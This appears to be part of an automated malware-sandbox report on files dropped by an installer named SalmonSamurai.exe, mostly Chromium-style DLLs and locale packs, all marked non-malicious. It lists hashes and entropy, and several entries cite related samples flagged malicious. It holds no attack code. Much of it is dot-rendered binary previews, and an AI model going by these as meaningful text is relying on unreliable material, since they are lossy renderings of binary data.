                                                                                                                                                                                                                                          SHA1:8D824C9CF0A84AB902E8069A4DE9BF6C1A9AAF3B
                                                                                                                                                                                                                                          SHA-256:C91ABF556E55C29D1EA9F560BB17CC3489CB67A5D0C7A22B58485F5F2FBCF25C
                                                                                                                                                                                                                                          SHA-512:039B50284D28DCD447E0A486A099FA99914D29B543093CCCDA77BBEFDD61F7B7F05BB84B2708AE128C5F2D0C0AB19046D08796D1B5A1CFF395A0689AB25CCB51
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..............t...#.....:.t...J~....K~....L~....M~....N~....O~....P~.%..Q~.*..R~.-..S~c5..T~.9..U~.A..V~.V..^~Ck.._~.m..b~)o..c~yr..j~#s..k~.}..l~....m~...n~...o~......................................K.....!..................Q..............*........................a.......................,%....H0.....2....E:....(A.....F.....L.....R.....T....QY....:].....f.....i....br....Sv..........C...........).................].....}................................................................................................. ....!....%.....*.....,..........O/...../....y1.....2....l4.....6.....7....A:.....?.....C.....K.....S.....Y....._.....e....Ok.....l.....m.....n.....o.....q.....r.....s.....u....:w..............P............................%.............7................,........G........u.............B........S.........a....%........;.....................l...........T..........R...........6..........).............

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4916712
                                                                                                                                                                                                                                          Entropy (8bit):6.398049523846958
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:49152:KCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvhiD0N+YEzI4og/RfzHLeHTRhFRNc:xG2QCwmHPnog/pzHAo/A6l
                                                                                                                                                                                                                                          MD5:2191E768CC2E19009DAD20DC999135A3
                                                                                                                                                                                                                                          SHA1:F49A46BA0E954E657AAED1C9019A53D194272B6A
                                                                                                                                                                                                                                          SHA-256:7353F25DC5CF84D09894E3E0461CEF0E56799ADBC617FCE37620CA67240B547D
                                                                                                                                                                                                                                          SHA-512:5ADCB00162F284C16EC78016D301FC11559DD0A781FFBEFF822DB22EFBED168B11D7E5586EA82388E9503B0C7D3740CF2A08E243877F5319202491C8A641C970
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                          • Filename: NativeApp_G5L1NHZZ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: AyqwnIUrcz.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: nanophanotool.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: 9VbeqQbgU4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: 9VbeqQbgU4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: ivySCI-5.6.3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: ivySCI-5.6.3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d...^.}`.........." ......8..........<).......................................K.....:FK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\ffmpeg.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):2883072
                                                                                                                                                                                                                                          Entropy (8bit):6.697367886822868
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:49152:YGJO72cNsdMZWfAn1fdmZMOqcQrGhjUHgNxGUwSCmmfYDJGz5SN3lzl3hSKqH:Jj8n1QqGCmmfIUz59t
                                                                                                                                                                                                                                          MD5:E096C168B79A56DED0DF1AA142D9F1DA
                                                                                                                                                                                                                                          SHA1:318F20DAB294A315BD935160E9417FB5B28300F5
                                                                                                                                                                                                                                          SHA-256:65CC75329D17EC264E7A2DB571EA55F918394241445EA64569A56C75D0CFDC60
                                                                                                                                                                                                                                          SHA-512:3DCCF6CE85EF7E75690A5851642F10BB5E6E1572E91E933BACB7FCBFE405B0412B94BA0E160C3BA8D68D2B9AFC1DA268F61C83DCCD6453D8C9470931EE900BFD
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$#..................................................@B...........`A..........................................*.......*.(.............@...............B..3....).......................).(....R#.@............"*.P............................text....##......$#................. ..`.rdata..l....@#......(#.............@..@.data...x.....*.."....*.............@....pdata........@.......*.............@..@.00cfg..8.....A.......+.............@..@.gxfg....,....A.......+.............@..@.retplne......A.......+..................tls..........A.......+.............@..._RDATA..\.....A.......+.............@..@.reloc...3....B..4....+.............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\icudtl.dat

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):10542048
                                                                                                                                                                                                                                          Entropy (8bit):6.277141340322909
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:98304:OKPBQYOo+ddlymOk25flQCUliXUxiG9Ha93Whla6ZGdnp/8k:OKPBhORjOhCliXUxiG9Ha93Whla6ZGrn
                                                                                                                                                                                                                                          MD5:D89CE8C00659D8E5D408C696EE087CE3
                                                                                                                                                                                                                                          SHA1:49FC8109960BE3BB32C06C3D1256CB66DDED19A8
                                                                                                                                                                                                                                          SHA-256:9DFBE0DAD5C7021CFE8DF7F52458C422CBC5BE9E16FF33EC90665BB1E3F182DE
                                                                                                                                                                                                                                          SHA-512:DB097CE3EB9E132D0444DF79B167A7DCB2DF31EFFBBD3DF72DA3D24AE2230CC5213C6DF5E575985A9918FBD0A6576E335B6EBC12B6258BC93FA205399DE64C37
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html .Q....B.......B...#...B.. $...B..p$...B...$...B...%...B..`P...C...P...C...Q..(C......<C.....OC......bC..@...uC.......C..P....C.......C.......C..p....C.. ....C.......C.......D..p... D.....3D..0...FD.....YD.....lD.......D......D..0....D.......D..p....D......D..@....D.......E......E..@...*E.....=E..P...NE......bE.....rE..@....E.......E.......E..P....E.......E......E..@....F.......F.....'F..0...7F..P...JF......aF......qF...G...F.. H...F..`K...F...K...F...L...F...-...F...c...G....'.'G....'.>G..@.'.UG..0.'.oG....'..G...!'..G...!'..G..P&'..G...)'..G..@*'..H..`.(..H...e).7H..0.).VH...)*.xH....*..H....*..H...P+..H...Y+..H...Z+..I...]+. I..`^+.9I.. .+.UI....+.lI....+..I..P.-..I...=...I.......I.......I.. ....J..p....J......-J..p...EJ......ZJ......rJ..`....J..@....J.......J.......J..0....J.......J.......J..0....K..@....K..../.2K...,/.GK..../.\K..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\libEGL.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):481280
                                                                                                                                                                                                                                          Entropy (8bit):6.330677392522242
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:F9L2FFtoVsruIzUEzUST6uHKw+BubaOQ74PlqF8:F9CGafznzUSTRY70I
                                                                                                                                                                                                                                          MD5:1EECFB04C4434F5A813C8F0C0C8F2C88
                                                                                                                                                                                                                                          SHA1:6DC3CA4B3F72E7FB33BA26FA488DE323EDB59ADD
                                                                                                                                                                                                                                          SHA-256:897CEB95FB164640DDD2426673997B5F6FC2619FD916B038B575A70A0682A706
                                                                                                                                                                                                                                          SHA-512:D7818A42A76508AC3150AEA8D4E168B2DB36F55F71983A177002086380A82E307624CFE37B01FFC3D7EB407485D182654D0D7C6A0C06CCAAE60666630469C7E0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$................................................................`A........................................00......F>..(.......x.... ...C..............0....(.......................'..(...@A..@...........pA...............................text....".......$.................. ..`.rdata.......@.......(..............@..@.data....L....... ..................@....pdata...C... ...D..................@..@.00cfg..8....p......................@..@.gxfg...`$.......&..................@..@.retplne.............>...................tls....!............@..............@..._RDATA..\............B..............@..@.rsrc...x............D..............@..@.reloc..0............J..............@..B................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\libGLESv2.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):7625728
                                                                                                                                                                                                                                          Entropy (8bit):6.463180789552528
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:98304:U8qvGdDtslh+LD3ZDWfnSvBSDU5bPm3k89Ld3gsOMt/:JD3ZXJ7bPWLWsD/
                                                                                                                                                                                                                                          MD5:CBA2436016F7A2838588A52D5B6F30F1
                                                                                                                                                                                                                                          SHA1:81DDF44B3E122DFBEE1A2CD8D4544364F1A621A4
                                                                                                                                                                                                                                          SHA-256:BCB3A3D2FCA3C33FA3D1D5DC976AA913CDC8001DF8E64C2CD3D2C545245141BF
                                                                                                                                                                                                                                          SHA-512:D92A880B5F83C5AE10AE9A83E38A293BB0E8C7659DD6ECE162FC752D57C9FCDE8036B81B023CD9F0F4F32B95B06FD4C366E20301010354B6CB904398A3149A44
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......Z...........M......................................`u...........`A..........................................k.8.....l.d....pt.......q.lO............t......vk.....................huk.(.....Z.@.............l.......k.@....................text...e.Z.......Z................. ..`.rdata..l.....Z.......Z.............@..@.data.........m..|....m.............@....pdata..lO....q..P....q.............@..@.00cfg..8.....t......Ps.............@..@.gxfg....+....t..,...Rs.............@..@.retplne.....@t......~s..................tls....:....Pt.......s.............@..._RDATA..\....`t.......s.............@..@.rsrc........pt.......s.............@..@.reloc........t.......s.............@..B................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\af.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):377708
                                                                                                                                                                                                                                          Entropy (8bit):5.4079285675542845
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:ebGJWQdLX/Wi6fR9a5DhZ2FQPnUGSBhjA636Zi2Jyn9Ybt5KXpgmLwSVxJsVxSjf:6GJW2bOi6fRmZ2OPnUThjA636Zi2Jynd
                                                                                                                                                                                                                                          MD5:7E51349EDC7E6AED122BFA00970FAB80
                                                                                                                                                                                                                                          SHA1:EB6DF68501ECCE2090E1AF5837B5F15AC3A775EB
                                                                                                                                                                                                                                          SHA-256:F528E698B164283872F76DF2233A47D7D41E1ABA980CE39F6B078E577FD14C97
                                                                                                                                                                                                                                          SHA-512:69DA19053EB95EEF7AB2A2D3F52CA765777BDF976E5862E8CEBBAA1D1CE84A7743F50695A3E82A296B2F610475ABB256844B6B9EB7A23A60B4A9FC4EAE40346D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........E...h.....i.....j.....k.....l.....n."...o.'...p.4...r.:...s.K...t.T...v.i...w.v...y.|...z.....|.....}.....................................................................................-.....>.....E.....N.....g.....p.....{...................................................../.....?.....K.....X.....y...........................................................<.....R.....W.....].....l.....y.....}.....................................................+.....9.....A.....I.....P.....U.....c.....s...............................................%.....J.....d.....m.....y...........................................................+.....2.....5.....6.....B.....L.....V.....].....g.............................O.....^.....k.................................................................".....5.....Q.....z....................................... .....".....%.....(.$...*.D...+.G...,.e........./.....0.....1.....3.....4.....5.....6.D...7.U...8.j...9.y...<.....=.....>.....?.....@.....A.....C.$...D.+.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\am.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):613642
                                                                                                                                                                                                                                          Entropy (8bit):4.894733266944232
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:b3pIuPzq8xSTwO8sgjZz5E9VJAVtnuviQix30jH8+I:b3plq8xLO8zjZz5E9VJAVtSiQO
                                                                                                                                                                                                                                          MD5:2009647C3E7AED2C4C6577EE4C546E19
                                                                                                                                                                                                                                          SHA1:E2BBACF95EC3695DAAE34835A8095F19A782CBCF
                                                                                                                                                                                                                                          SHA-256:6D61E5189438F3728F082AD6F694060D7EE8E571DF71240DFD5B77045A62954E
                                                                                                                                                                                                                                          SHA-512:996474D73191F2D550C516ED7526C9E2828E2853FCFBE87CA69D8B1242EB0DEDF04030BBCA3E93236BBD967D39DE7F9477C73753AF263816FAF7D4371F363BA3
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........W...h.....i.....j.'...k.6...l.A...n.I...o.N...p.[...r.a...s.r...t.{...v.....w.....y.....z.....|.....}.........................................................................7.....S.....i.........................................L.....k.....m.....q...................................1.....A.....`.............................".....4.....=.....\.....~...................................5.....Q.....W.....Z.....i.............................K.....z.....................................................8.....G.....`.............................".........................................>.....A.....s.............................@.....G.....J.....K.....W.....`.....|.......................<............................./.....g.....w...............................................3.......................E.....j.....p.....x..................... .....".....%.6...(.c...*.....+.....,.........../.....0.....1.]...3.y...4.....5.....6.K...7.s...8.....9.....;.....<.....=.....>.?...?.I...@.i...A.....C...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\ar.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):671738
                                                                                                                                                                                                                                          Entropy (8bit):4.903433286644294
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:gjptqBycpX8vYULIrmhkH+P5NNb++YTzgpPMgSENeX:BB2um5S++
                                                                                                                                                                                                                                          MD5:47A6D10B4112509852D4794229C0A03B
                                                                                                                                                                                                                                          SHA1:2FB49A0B07FBDF8D4CE51A7B5A7F711F47A34951
                                                                                                                                                                                                                                          SHA-256:857FE3AB766B60A8D82B7B6043137E3A7D9F5CFB8DDD942316452838C67D0495
                                                                                                                                                                                                                                          SHA-512:5F5B280261195B8894EFAE9DF2BECE41C6C6A72199D65BA633C30D50A579F95FA04916A30DB77831F517B22449196D364D6F70D10D6C5B435814184B3BCF1667
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........*...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.!...v.6...w.C...y.I...z.X...|.^...}.p.....x.....}.................................................................'.....^.....n...................................'.....*...........V.....x.........................................G.....].....p...............................................o...................................................../.....Q.....s.......................(....._.....i.....q.....x.............................#.....:.....m.......................).....Z.....k.........................................$.....?.....U.....k...........................................................p.................7.....L.....h.......................!.....1.....9.....E.....g.......................&.....Z............................................. .'...".D...%.x...(.....*.....+.....,.6.....M.../.~...0.....1.....3.....4.....5.,...6.....7.....8.....9.....;.....<.:...=.P...>.....?.....@.....A.....C.....D.....E.!...F._.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\bg.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):701716
                                                                                                                                                                                                                                          Entropy (8bit):4.66095894344634
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:7Od6KqVw2iILlY+dAs1aQUfjoaVV4FH2mFxvx35uKN3CuKb7szmV2Jfu64K+z5jG:KsKqJi6lY+dAs1aQU7yZx35uK4XQzQI9
                                                                                                                                                                                                                                          MD5:A19269683A6347E07C55325B9ECC03A4
                                                                                                                                                                                                                                          SHA1:D42989DAF1C11FCFFF0978A4FB18F55EC71630EC
                                                                                                                                                                                                                                          SHA-256:AD65351A240205E881EF5C4CF30AD1BC6B6E04414343583597086B62D48D8A24
                                                                                                                                                                                                                                          SHA-512:1660E487DF3F3F4EC1CEA81C73DCA0AB86AAF121252FBD54C7AC091A43D60E1AFD08535B082EFD7387C12616672E78AA52DDDFCA01F833ABEF244284482F2C76
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........P...h.....i.....j.....k.%...l.0...n.8...o.=...p.J...r.P...s.a...t.j...v.....w.....y.....z.....|.....}.........................................................................F.....h...............................................[.........................................#.....Q.....x...................................[.........................................T...............................................'.....U......................./.....c...............................................>.....s.............................4.....^................. .....9.....V.....l...................................\...............................................&.....B.....S.....v...............................................O.....r...................................0.......................9.....z.......................-.....[............... .....".....%.....(.E...*.q...+.t...,.........../.....0.....1.....3.....4.....5.....6.....7.....8.....9.....;.3...<.G...=._...>.....?.....@.....A.....C.F.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\bn.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):904943
                                                                                                                                                                                                                                          Entropy (8bit):4.273773274227575
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:wqf22AwWk+ADszaaH0PaMadiMNKVbVtQW01jilDouMGsW2uMBVr+9RU4yVS5PMxq:1zW/AMfafVoCp8YbkJBbdJ2DB5y0XlRB
                                                                                                                                                                                                                                          MD5:5CDD07FA357C846771058C2DB67EB13B
                                                                                                                                                                                                                                          SHA1:DEB87FC5C13DA03BE86F67526C44F144CC65F6F6
                                                                                                                                                                                                                                          SHA-256:01C830B0007B8CE6ACA46E26D812947C3DF818927B826F7D8C5FFD0008A32384
                                                                                                                                                                                                                                          SHA-512:2AC29A3AA3278BD9A8FE1BA28E87941F719B14FBF8B52E0B7DC9D66603C9C147B9496BF7BE4D9E3AA0231C024694EF102DCC094C80C42BE5D68D3894C488098C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........K...h.....i.....j.....k.$...l./...n.7...o.=...p.J...r.P...s.a...t.j...v.....w.....y.....z.....|.....}.............................................................................................................7.....a.......................".....$.....(.....P.......................+.....T.....p.......................H...................................M.....c...........5.....D....._.........................................A.....z.................B.......................................................................H.....a.....s.........................................B.....g.............................3.....W.....{...............................................>...........j...................................6.....R.........................................g...........9.....u...........V...................................8... .M...".....%.....(. ...*.\...,._........./.....0.....1.`...3.....4.....5.....6.....7.....8.E...9.d...;.....<.....=.....>."...?.5...@.j...A.....C.3...D.S.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\ca.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):426906
                                                                                                                                                                                                                                          Entropy (8bit):5.400864409916039
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:+XnGrijIs3cSlFEYLCJBB43nbhjJSwmrwiwWzM1ldLbpuQ16BtryBBwIle3nei3X:iNV4ossMNu51hnW5CptA
                                                                                                                                                                                                                                          MD5:D259469E94F2ADF54380195555154518
                                                                                                                                                                                                                                          SHA1:D69060BBE8E765CA4DC1F7D7C04C3C53C44B8AB5
                                                                                                                                                                                                                                          SHA-256:F98B7442BEFC285398A5DD6A96740CBA31D2F5AADADD4D5551A05712D693029B
                                                                                                                                                                                                                                          SHA-512:D0BD0201ACF4F7DAA84E89AA484A3DEC7B6A942C3115486716593213BE548657AD702EF2BC1D3D95A4A56B0F6E7C33D5375F41D6A863E4CE528F2BD6A318240E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........N...h.....i.....j.....k.!...l.,...n.4...o.9...p.F...r.L...s.]...t.f...v.{...w.....y.....z.....|.....}...............................................................................6.....O.....o.....|.....................................................2.....J.....j.....q...........................................................1.....;.....M.....].......................................................................D.....i.................................................................+.....2.....?.....u.........................................".....5.....F.....b.....e.....}.............................................................................&.....h......................./.....P.....s.....................................................4.....P.....|...............................................:.....F... .Q...".g...%.....(.....*.....+.....,.........../.-...0.2...1.h...3.x...4.....5.....6.....7.....8.....9.(...;.6...<.D...=.R...>.l...?.v...@.....A.....C.....D.....E...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\cs.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):436202
                                                                                                                                                                                                                                          Entropy (8bit):5.843819816549512
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:U4ftEfqE2jv7ShUjBA59wjd558YAGKND9Gto8QV:U41HE2jjShqywjd558YAbNDcI
                                                                                                                                                                                                                                          MD5:04A680847C4A66AD9F0A88FB9FB1FC7B
                                                                                                                                                                                                                                          SHA1:2AFCDF4234A9644FB128B70182F5A3DF1EE05BE1
                                                                                                                                                                                                                                          SHA-256:1CC44C5FBE1C0525DF37C5B6267A677F79C9671F86EDA75B6FC13ABF5D5356EB
                                                                                                                                                                                                                                          SHA-512:3A8A409A3C34149A977DEA8A4CB0E0822281AED2B0A75B02479C95109D7D51F6FB2C2772CCF1486CA4296A0AC2212094098F5CE6A1265FA6A7EB941C0CFEF83E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:......../...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.(...v.=...w.J...y.P...z._...|.e...}.w.........................................................................................#.....,.....9.....V.....d.........................................!.....?.....L.....X.....d.....o.....................................................".....4.....E.....{.......................................................................8.....O.....d.....{.................................................................H.....Z.....h.....................................................9.....<.....J.....X.....h.....w.................................................................!.....p.......................".....>.....s.....................................................&.....N.....n.........................................+.....5... .=...".N...%.u...(.....*.....+.....,.........../.....0.....1.H...3.V...4.s...5.....6.....7.....8.....9.....<."...=.,...>.A...?.I...@.[...A.....C.....D...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\da.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):396104
                                                                                                                                                                                                                                          Entropy (8bit):5.454826678090317
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:Q3rSn4RJ28687mlwlGXaJwZkqEb1Phv6VP5yarXGzOJixhd4/TWwS:eND/xqkqEO5nrFTq
                                                                                                                                                                                                                                          MD5:1A53D374B9C37F795A462AAC7A3F118F
                                                                                                                                                                                                                                          SHA1:154BE9CF05042ECED098A20FF52FA174798E1FEA
                                                                                                                                                                                                                                          SHA-256:D0C38EB889EE27D81183A0535762D8EF314F0FDEB90CCCA9176A0CE9AB09B820
                                                                                                                                                                                                                                          SHA-512:395279C9246BD30A0E45D775D9F9C36353BD11D9463282661C2ABD876BDB53BE9C9B617BB0C2186592CD154E9353EA39E3FEED6B21A07B6850AB8ECD57E1ED29
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........[...h.....i.)...j.5...k.D...l.O...n.W...o.\...p.i...r.o...s.....t.....v.....w.....y.....z.....|.....}.........................................................................?.....M.....].....q.....y...........................................................4.....K.....R.....].....m.....t...........................................................5.....F.....u.............................................................................9.....T.....m.....w.....z................................................................./.....E.....k.............................................................................+.....2.....5.....6.....=.....F.....L.....S.....^.............................X.....n.......................................................................F.....[................................................... .....".....%.,...(.T...*.....+.....,.........../.....0.....1.....3.....4.%...5.=...6.o...7.....8.....9.....;.....<.....=.....>.....?.....@.....A.%...C.B...D.L.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\de.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):424277
                                                                                                                                                                                                                                          Entropy (8bit):5.503137231857292
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:TFigju3qg4wajEzUKnYm31SOmhqYl51gHNiOIkCJD:TFiecqg1aqHSOu599kCJD
                                                                                                                                                                                                                                          MD5:8E6654B89ED4C1DC02E1E2D06764805A
                                                                                                                                                                                                                                          SHA1:FF660BC85BB4A0FA3B2637050D2B2D1AECC37AD8
                                                                                                                                                                                                                                          SHA-256:61CBCE9A31858DDF70CC9B0C05FB09CE7032BFB8368A77533521722465C57475
                                                                                                                                                                                                                                          SHA-512:5AC71EDA16F07F3F2B939891EDA2969C443440350FD88AB3A9B3180B8B1A3ECB11E79E752CF201F21B3DBFBA00BCC2E4F796F347E6137A165C081E86D970EE61
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:............h.V...i.g...j.s...k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.............#.....+.....3.....;.....B.....I.....P.....Q.....R.....T...........................................................$.....:.....<.....@.....h.....}.....................................................-.....Q.....d.....j.....s...............................................4.....K.....O.....R.....[.....t...................................D.....Q.....[.....c.....j.....p.....}...............................................0.....d.................................................................6.....O.....i.....p.....s.....t.....~...................................=...................................6.....?.....Q.....[.....h.....m.....r...................................(.....Y.....u.....{........................... .....".....%.....(.....*./...+.2...,.P.....a.../.w...0.....1.....3.....4.....5.....6.A...7.U...8.i...9.w...;.....<.....=.....>.....?.....@.....A.....C.....D.%.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\el.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):769050
                                                                                                                                                                                                                                          Entropy (8bit):4.75072843480339
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:H/58dBquNw2202pgtZSWjZ4LIbsJvaP5A3HKQiEQBR07391qf2utKMaBlS9WffFR:H8BquNw2202pgtsWjyLrJvaRA3HtiEQG
                                                                                                                                                                                                                                          MD5:9528D21E8A3F5BAD7CA273999012EBE8
